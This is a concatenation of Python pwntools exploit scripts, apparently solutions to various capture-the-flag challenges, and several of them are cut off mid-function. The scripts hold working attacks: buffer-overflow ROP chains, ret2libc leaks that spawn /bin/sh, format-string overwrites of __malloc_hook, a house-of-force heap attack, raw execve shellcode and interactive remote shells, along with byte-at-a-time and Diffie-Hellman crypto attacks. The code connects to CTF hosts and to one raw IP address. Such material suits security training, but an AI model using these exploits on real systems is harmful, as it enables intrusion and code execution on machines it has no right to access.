def solve(): cnt = 0 flag = 'picoCTF{@' # sitrep,agent_code='','' # message =msg[0] +sitrep+msg[1]+agent_code+msg[2] for j in range(38 - len(flag)): for i in string.printable: # print "flag:",i r = connect("2018shell.picoctf.com", 31123) cnt += 1 time.sleep(1) prompt = r.recvuntil("report: ") # 113 + (11+16+38+10) + 38 = 226 base = 'fying code is: ' + flag sitrep = '@' * 11 + base[-15:] + i + '@' * (38 - len(flag) + 10) # agent_code="#"*38 # message =msg[0] +sitrep+msg[1]+agent_code+msg[2] # print '\n'.join(map(repr,part_msg(message))) r.sendline(sitrep) response = r.recv() # print len(response) tmp = part_msg(response, 32) # print len(tmp) # print '\n'.join(tmp) r.close() # print len(msg[0]+sitrep+msg[1]+flag)/16 if tmp[4] == tmp[len(msg[0] + sitrep + msg[1] + flag) / 16]: flag += i break print "flag:", flag, cnt
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: pr.readline() line = pr.readline().strip().decode().split() des3 = DES3.new( str(int(time())).zfill(16).encode("utf-8"), DES3.MODE_CFB, b"00000000") a, b = int(line[0]), int(line[2]) print(a, b) pr.sendlineafter('>', str(a * b)) pr.readline() enc = bytes.fromhex(pr.readline().strip().decode()) dec = des3.decrypt(enc) pr.sendlineafter('>', dec) print(dec, len(dec)) print(pr.readline()) print(pr.readall(2)) except Exception as e: print(e) finally: pr.close()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) rop = pwn.ROP(elf) pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address) pop_rsi = pwn.p64( rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address) print(pop_rdi) print(pop_rsi) payload = b"A" * 72 payload += pop_rdi payload += pwn.p64(0xdeadbeef) payload += pop_rsi payload += pwn.p64(0x1337c0de) payload += pwn.p64(0x1337c0de) payload += pwn.p64(elf.sym['win']) print(payload, len(payload)) pr.sendafter("joke\n", payload) pr.sendline() pr.sendline("cat flag.txt") print(pr.readall(2)) except Exception as e: print(e) finally: pr.close()
def exploit(remote=False): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) rop = pwn.ROP(elf) print(pr.readline()) """ Find padding via gdb gef➤ info frame Stack level 0, frame at 0x7fffffffda48: rip = 0x401153 in vuln; saved rip = 0x6161616161616164 called by frame at 0x7fffffffda58 Arglist at 0x6161616161616163, args: Locals at 0x6161616161616163, Previous frame's sp is 0x7fffffffda50 Saved registers: rip at 0x7fffffffda48 gef➤ pattern search 0x6161616161616164 [+] Searching '0x6161616161616164' [+] Found at offset 24 (little-endian search) likely [+] Found at offset 17 (big-endian search) """ payload = b'a' * 24 # gadgets from output of 'ROPgadget --binary weird-rop-f17e9f493733a383aac548dbf1320c33' pop_rdx = pwn.p64(0x4010de) mov_rax_0 = pwn.p64(0x401002) mov_rax_1 = pwn.p64(0x40100a) mov_rdi_1 = pwn.p64(0x401012) xor_rdi_0x53 = pwn.p64(0x40107d) xor_rdi_0x56 = pwn.p64(0x40101b) xor_rdi_0x198 = pwn.p64(0x4010c3) xor_rdi_0x19b = pwn.p64(0x40104c) if remote: payload += xor_rdi_0x56 payload += xor_rdi_0x53 else: payload += xor_rdi_0x19b payload += xor_rdi_0x198 payload += pop_rdx payload += pwn.p64(0x19) # read length payload += mov_rax_0 payload += pwn.p64(rop.find_gadget(['syscall'])[0]) payload += mov_rax_1 payload += mov_rdi_1 payload += pwn.p64(rop.find_gadget(['syscall'])[0]) pr.sendline(payload) print(pr.readall(2)) finally: pr.close()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF('baby_bof') libc = pwn.ELF('libc-2.31.so') rop = pwn.ROP(elf) pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address) payload = b'A' * 18 payload += pop_rdi payload += pwn.p64(elf.got['puts']) payload += pwn.p64(elf.plt['puts']) payload += pwn.p64(elf.sym['vuln']) pr.sendlineafter("me\n", payload) print(pr.readline()) out = pr.readline().strip() puts_addr = int.from_bytes(out[:8], 'little') print('puts @', hex(puts_addr)) """Also works if remote: sys = puts_addr - 0x32190 bin_sh = puts_addr + 0x13000a else: sys = puts_addr - 0x2e660 bin_sh = puts_addr + 0x116eb6 """ libc.address = puts_addr - libc.symbols['puts'] sys = libc.symbols['system'] bin_sh = next(libc.search(b'/bin/sh')) print('sys @', hex(sys)) print('bin_sh @', hex(bin_sh)) ret = pwn.p64(rop.find_gadget(['ret']).address) payload = b'A' * 18 payload += ret payload += pop_rdi payload += pwn.p64(bin_sh) payload += pwn.p64(sys) payload += pwn.p64(elf.sym['vuln']) print(payload) pr.sendafter('me\n', payload) pr.sendline() pr.sendline('cat flag.txt') print(pr.readall(4)) except Exception as e: print(e) finally: pr.close()
def main(): # p = process(["./ld-2.31.so", "./stack"], env = {"LD_PRELOAD": "./libc-2.31.so"}) p = connect("asu-cse545.com", 6666) attack = leak_libc() p.sendline(attack) print(p.recvline()) print(p.recvline()) s = p.recvline() base = int.from_bytes(s.strip(), "little") - 0x875a0 print("base address: 0x%x" % base)
def exploit(): pr = pwn.connect(host, port) elf = pwn.ELF(target) rop = pwn.ROP(elf) payload = b"A" * 32 rop.set_lock() rop.shell() payload += rop.chain() print('len:', len(payload), payload) pr.sendlineafter("What would a hero say ?\n>>> ", payload) print(pr.readall(2))
def remote(): pr = pwn.connect(host, port) try: pr.readline() while True: s = pr.readline().decode().strip() print(s, end=' ') ans = calc(s) print(ans) pr.sendlineafter(': ', str(ans)) except Exception as ex: pass finally: pr.close()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) rop = pwn.ROP(elf) main_addr = pr.readline().strip().decode() main_addr = int(main_addr[main_addr.find('street ') + 7:], 16) print('main @', hex(main_addr)) ca_addr = main_addr + (elf.sym['california'] - elf.sym['main']) si_addr = main_addr + (elf.sym['silicon_valley'] - elf.sym['main']) loss_addr = main_addr + (elf.sym['loss'] - elf.sym['main']) print('ca @', hex(ca_addr)) print('si @', hex(si_addr)) print('loss @', hex(loss_addr)) """ california() => win_land='/bin' silicon_valley() => win_land='/bin/sh' loss(0x1337c0de, 0xdeadc0de-0x1337c0de) """ pop_rdi = pwn.p64(main_addr + (rop.find_gadget(['pop rdi', 'ret']).address - elf.sym['main'])) pop_rsi = pwn.p64(main_addr + ( rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address - elf.sym['main'])) payload = b'A' * 40 payload += pwn.p64(ca_addr) payload += pwn.p64(si_addr) payload += pop_rdi + pwn.p64(0x1337c0de) payload += pop_rsi + pwn.p64(0xcb760000) + pwn.p64(0xcb760000) payload += pwn.p64(loss_addr) print(len(payload), payload) pr.sendafter('often?\n', payload) pr.sendline() pr.sendline('cat flag.txt') print(pr.readall(4)) except Exception as e: print(e) finally: pr.close()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: num = int(pr.readline().decode()) print(num) for i in range(1, num+1): tri = triangle(num, i) print(tri) pr.sendline(str(tri)) print(pr.readall(2)) finally: pr.close()
def guess(remote, flag): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: pr.sendlineafter('\n> ', flag) ret = 0 while True: line = pr.readline().strip() if line.startswith(b'Ho') or line.startswith(b'We'): break ret += len(line.split()) return ret finally: pr.close()
def exploit(remote): pwn.context.clear(bits=64) if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target, env={'LD_PRELOAD': 'libc-2.27.so'}) try: elf = pwn.ELF(target, False) libc = pwn.ELF('./libc-2.27.so', False) # one_gadget libc-2.27.so from libc6_2.27-3ubuntu1.4_amd64.deb gadgets = [0x4f3d5, 0x4f432, 0x10a41c] payload = "%{}$p".format(23) pr.sendlineafter("point\n", payload) pr.readline() # 0x00007fffffffda08│+0x0088: 0x00007ffff7dfb082 → <__libc_start_main+231> mov edi, eax libc_start_main_addr = int(pr.readline().strip().decode(), 16) - 231 libc.sym['gadget'] = gadgets[2] libc.address = libc_start_main_addr - libc.sym['__libc_start_main'] print('libc @', hex(libc.address)) print('gadget @', hex(libc.sym['gadget'])) print('__libc_start_main @', hex(libc_start_main_addr)) print('__malloc_hook @', hex(libc.sym['__malloc_hook'])) stack_offset = 6 payload = pwn.fmtstr_payload( stack_offset, {libc.sym["__malloc_hook"]: libc.sym['gadget']}, write_size='short') print(payload, len(payload)) pr.sendafter("point\n", payload) pr.sendline() payload = b"%65537$c" pr.sendafter("point\n", payload) pr.sendline() pr.readline() pr.sendline('cat flag.txt') print(pr.readall(2)) except Exception as e: print(e) finally: pr.close()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: elf = pwn.ELF(target) print('win_game @', hex(elf.sym['win_game'])) pr.sendlineafter('BOF it to start!\n', 'BOF') payload = b'A' * 56 payload += pwn.p64(elf.sym['win_game']) shouted = False print(payload) while True: cmd = pr.readline() print(cmd) if b"Twist" in cmd: if shouted: pr.send(payload) pr.sendline() print(pr.readall(2)) else: pr.sendline('T') elif b"Pull" in cmd: if shouted: pr.send(payload) pr.sendline() print(pr.readall(2)) else: pr.sendline('P') elif b"BOF" in cmd: if shouted: pr.send(payload) pr.sendline() print(pr.readall(2)) else: pr.sendline('B') elif b"Shout" in cmd: pr.send(payload) pr.sendline() shouted = True finally: pr.close()
def remote(): pr = pwn.connect(host, port) try: while True: pr.readline() pr.readline() pr.readline() n = pr.readline().decode().strip() print(n, end=' ') if not n.isnumeric(): break ans = calc(int(n)) print(ans) pr.sendline(str(ans)) except Exception as ex: print(ex) finally: pr.close()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: payload = b"A"*24 payload += pwn.p64(0x1337c0de) print(payload, len(payload)) pr.sendafter("dreaming?\n", payload) pr.sendline() pr.sendline('cat flag.txt') print(pr.readall(2)) except Exception: pass finally: pr.close()
def remote(): pr = pwn.connect(host, port) try: pr.readline() pr.readline() pr.readline() while True: line = pr.readline().decode().strip() if not line.startswith('M'): print(line) break ms, ds = line.split() me, de = pr.readline().decode().strip().split() i1, v1 = pr.readline().decode().strip().split() i2, v2 = pr.readline().decode().strip().split() ms = int(ms[1:]) ds = int(ds[1:]) me = int(me[1:]) de = int(de[1:]) i1 = int(i1[1:]) v1 = int(v1[1:]) i2 = int(i2[1:]) v2 = int(v2[1:]) print(f'ms={ms} ds={ds}') print(f'me={me} de={de}') print(f'i1={i1} v1={v1}') print(f'i2={i2} v2={v2}') ans = calc(ms,ds,me,de,i1,v1,i2,v2) print(f'ans={ans}') pr.sendline(str(ans)) print(pr.readline()) print(pr.readline()) print(pr.readline()) print(pr.readall(2)) except Exception as ex: print(ex) finally: pr.close()
def exploit(remote): if remote: pr = pwn.connect(host, port) else: pr = pwn.process(target) try: payload = '' for i in range(11, 7, -1): payload += "%{}$lx".format(i) pr.sendafter("name?\n", payload) pr.sendline() s = pr.readall(2).decode().strip() s = s[s.find(' ') + 1:] print(s) print(''.join( reversed(''.join( [chr(int(s[i:i + 2], 16)) for i in range(0, len(s), 2)])))) except Exception as e: print(e) finally: pr.close()
def find_shuffled(): ALPHABET = string.ascii_letters + string.digits + "_!@#$%.'\"+:;<=}{" shuffled = [] pr = pwn.connect(host, port) ret = '' try: pr.readline() flag = pr.readline().strip().decode() for a in ALPHABET: pr.sendlineafter('>', a * len(flag)) pr.readline() enc = pr.readline().strip().decode() print(a, enc) shuffled.append(enc[0]) for a in flag: i = shuffled.index(a) ret += ALPHABET[i] finally: pr.close() return ret
def exploit(): pr = pwn.connect(host, port) try: pr.readline() pr.sendline('{"option":"sign","message":""}') """ c0 = e(key) c1 = e(padding) """ c1 = bytes.fromhex( json.loads(pr.readline().strip().decode())["signature"]) data = b'admin=True' + b'\x06' * 6 fake = pwn.xor(AES.new(data, AES.MODE_ECB).encrypt(c1), c1).hex() """ p0 = key p1 = padding_16 p2 = admin=True + padding_6 """ data = (b'\x10' * 16 + b'admin=True').hex() pr.sendline( f'{{"option":"get_flag","signature":"{fake}","message":"{data}"}}') print(pr.readline()) finally: pr.close()
def exploit(): pr = pwn.connect(host, port) try: pr.readuntil(": ") line = json.loads(pr.readline().strip().decode()) #p = int(line['p'][2:].strip('f'), 16) p = int(line['p'], 16) g = int(line['g'], 16) A = int(line['A'], 16) payload = json.dumps({"p": hex(p), "g": hex(g), "A": hex(p)}) print(payload, len(payload)) pr.sendlineafter(": ", payload) pr.readuntil(": ") line = json.loads(pr.readline().strip().decode()) B = int(line['B'], 16) payload = json.dumps({"B": hex(p)}) print(payload, len(payload)) pr.sendlineafter(": ", payload) pr.readuntil(": ") line = json.loads(pr.readline().strip().decode()) print(line) iv = bytes.fromhex(line['iv']) encrypted_flag = bytes.fromhex(line['encrypted_flag']) sha1 = hashlib.sha1() secret = 0 sha1.update(str(secret).encode()) key = sha1.digest()[:16] aes = AES.new(key, AES.MODE_CBC, iv) print(aes.decrypt(encrypted_flag)) finally: pr.close()
p.sendafter('Please enter the name of item:', payload) return None def change_item(p, index, size, payload): print 'change_item', str(index), str(size), repr(payload) p.sendlineafter('Your choice:', '3') p.sendlineafter('Please enter the index of item:', str(index)) p.sendlineafter('Please enter the length of item name:', str(size)) p.sendafter('Please enter the new name of the item:', payload) return None # The house of force if __name__ == '__main__': if pwnlib.args.args['REMOTE']: p = pwn.connect('csie.ctf.tw', 10138) else: p = pwn.process('./bamboobox-649a39b0d66eb71eec94b300a629e9f645bd75ad') size_of_first_block = 0x30 p.settimeout(PIPE_CLEAN_TIME) add_item(p, size_of_first_block, 'x'*(size_of_first_block-1) ) payload = 'y'*size_of_first_block payload += '\x00'*8 # prev_size payload += '\xFF'*8 # size, top chunk size to negative change_item(p, 0, len(payload)+1, payload) add_item(p, -size_of_first_block-0x10-0x20-0x10, '') add_item(p, 0x10, pwn.p64(MAGIC_ADDRESS)*2)
import pwn import pwnlib pwn.context.clear(arch='amd64') pwn.context.terminal = ['tmux', 'splitw', '-h'] shellcode = "\xB3\x02\x49\xBC\x2D\x62\x69\x6E\x2F\x73\x68\x00\x4C\x01\xE3\x53\x48\x8D\x3C\x24\xB0\x3B\x0F\x05" if __name__ == '__main__': if pwnlib.args.args['REMOTE']: p = pwn.connect('52.69.40.204', 8361) else: p = pwn.process('./easy_to_say-c7dd6cdf484305f7aaac4fa821796871') print repr(shellcode) p.sendafter('Give me your code :', shellcode) p.interactive()
if not ONLINE: LIBC_PATH = "/lib/i386-linux-gnu/libc.so.6" if GDB_BEGIN: log("Starting with GDB BEGIN") c = pwn.gdb.debug(BINARY_PATH, GDB_SCRIPT) else: log("Starting \"{}\"".format(BINARY_PATH)) c = pwn.process(BINARY_PATH) if GDB_DEBUG: log("Attaching GDB") pwn.gdb.attach(c, GDB_SCRIPT) else: LIBC_PATH = "./libc-2.27.so" c = pwn.connect(HOST, PORT) LIBC = pwn.ELF(LIBC_PATH) # Really gross way of parsing out the leaked data... def grossLeak(leak, payload): try: # Get what we're interested in. leak = "'$'".join( leak.split("': No such file")[0].split( payload[-4:])[1:]).split("'$'") # Remove empty elements. leak = [l for l in leak if len(l) > 0] # Converting from "\\xx\\xx\\xx" ascrii representation to raw bytes. for i, x in enumerate(leak):
from pwnlib import shellcraft from pwnlib.args import args from pwn import connect, process, p64, asm shellcode = shellcraft.amd64.linux.sh() shellcode = asm(shellcode, arch='amd64', os='linux') print len(shellcode) payload = 'x' * 248 + p64(0x601080) if args['REMOTE']: p = connect('csie.ctf.tw', 10126) else: p = process('./ret2sc-a6a74cce51b034b6570e5416a38973c195d1b414') p.sendline(shellcode) p.sendline(payload) p.interactive()
import pwn #proc = pwn.process('../challenge/src/adder') proc = pwn.connect('localhost', 12345) proc.recvuntil('add> ') proc.sendline('debug') proc.recvuntil('main @ ') main_addr_s = proc.recvline().strip() proc.recvuntil('printf @ ') printf_addr_s = proc.recvline().strip() proc.recvuntil('malloc @ ') malloc_addr_s = proc.recvline().strip() main_addr, printf_addr, malloc_addr = (int(main_addr_s, 0), int(printf_addr_s, 0), int(malloc_addr_s, 0)) print(main_addr, printf_addr, malloc_addr) sub_rsp_addr = main_addr - 0x11e5 + 0x17f6 flag_addr = main_addr - 0x11e5 + 0x20e6 print_asciiart = main_addr - 0x11e5 + 0x1749 rop_nop = main_addr - 0x11e5 + 0x17fd pop_rdi_addr = main_addr - 0x11e5 + 0x17ee proc.recvuntil('RSP is ') reg_line = proc.recvline().split(b',') rsp = int(reg_line[0], 0) rbp = int(reg_line[1].split(b' ')[3], 0) print(rsp, rbp)
def remote(argv=[], *a, **kw): '''Connect to the process on the remote host''' io = pwn.connect(host, port) if pwn.args.GDB: pwn.gdb.attach(io, gdbscript=gdbscript) return io
def __init__(self, remote): if remote: self.pr = pwn.connect(host, port) else: self.pr = pwn.process(target)